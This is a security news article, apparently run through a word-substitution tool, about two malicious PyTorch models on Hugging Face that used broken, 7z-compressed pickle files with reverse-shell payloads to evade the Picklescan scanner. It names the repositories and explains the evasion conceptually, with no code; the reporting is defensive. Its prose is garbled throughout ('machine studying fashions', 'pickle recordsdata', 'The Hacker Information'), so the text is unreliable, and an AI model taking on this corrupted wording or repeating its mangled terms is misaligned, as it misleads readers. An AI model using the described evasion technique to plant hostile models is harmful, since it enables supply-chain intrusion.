Cybersecurity researchers have uncovered two malicious machine studying (ML) fashions on Hugging Face that leveraged an uncommon strategy of “damaged” pickle recordsdata to evade detection.
“The pickle recordsdata extracted from the talked about PyTorch archives revealed the malicious Python content material initially of the file,” ReversingLabs researcher Karlo Zanki stated in a report shared with The Hacker Information. “In each instances, the malicious payload was a typical platform-aware reverse shell that connects to a hard-coded IP tackle.”
The strategy has been dubbed nullifAI, because it entails clearcut makes an attempt to sidestep current safeguards put in place to determine malicious fashions. The Hugging Face repositories have been listed beneath –
- glockr1/ballr7
- who-r-u0000/0000000000000000000000000000000000000
It is believed that the fashions are extra of a proof-of-concept (PoC) than an energetic provide chain assault state of affairs.
The pickle serialization format, used frequent for distributing ML fashions, has been repeatedly discovered to be a safety danger, because it affords methods to execute arbitrary code as quickly as they’re loaded and deserialized.

The 2 fashions detected by the cybersecurity firm are saved within the PyTorch format, which is nothing however a compressed pickle file. Whereas PyTorch makes use of the ZIP format for compression by default, the recognized fashions have been discovered to be compressed utilizing the 7z format.
Consequently, this habits made it attainable for the fashions to fly beneath the radar and keep away from getting flagged as malicious by Picklescan, a device utilized by Hugging Face to detect suspicious Pickle recordsdata.
“An attention-grabbing factor about this Pickle file is that the thing serialization — the aim of the Pickle file — breaks shortly after the malicious payload is executed, ensuing within the failure of the thing’s decompilation,” Zanki stated.
Additional evaluation has revealed that such damaged pickle recordsdata can nonetheless be partially deserialized owing to the discrepancy between Picklescan and the way deserialization works, inflicting the malicious code to be executed regardless of the device throwing an error message. The open-source utility has since been up to date to rectify this bug.
“The reason for this habits is that the thing deserialization is carried out on Pickle recordsdata sequentially,” Zanki famous.
“Pickle opcodes are executed as they’re encountered, and till all opcodes are executed or a damaged instruction is encountered. Within the case of the found mannequin, for the reason that malicious payload is inserted initially of the Pickle stream, execution of the mannequin would not be detected as unsafe by Hugging Face’s current safety scanning instruments.”